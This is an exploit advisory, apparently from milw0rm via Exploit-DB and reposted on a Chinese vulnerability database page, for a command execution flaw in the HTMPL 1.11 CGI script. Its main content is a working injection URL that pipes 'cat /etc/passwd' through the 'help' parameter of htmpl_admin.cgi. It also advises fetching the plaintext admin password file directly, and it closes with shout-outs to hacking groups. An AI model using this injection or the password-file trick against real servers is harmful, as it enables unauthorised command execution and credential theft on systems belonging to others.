https://www.exploit-db.com/exploits/7404
HTMPL 1.11 - Command Execution






漏洞ID | 1057018 | 漏洞类型 | |
发布时间 | 2008-12-10 | 更新时间 | 2008-12-10 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Software : HTMPL v1.11
Download Link : http://vmeste.org/templ_ex/doc/1.html
Vulnrability : Command Execution
Severity : High
Author : ZeN
Website : http://dusecurity.com / http://darkcode.me/
Exploit :
site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd
A few other little..... tricks
The admins password is kept plaintext in the file 'adminpass', you can just access it directly
in the same directory.
Thanks str0ke ;)
Shouts to :
DU Security Group
DarkCoders
WL-Group
Milw0rm
EnigmaGroup
IWannaHack
HackHound
# milw0rm.com [2008-12-10]
检索漏洞
开始时间
结束时间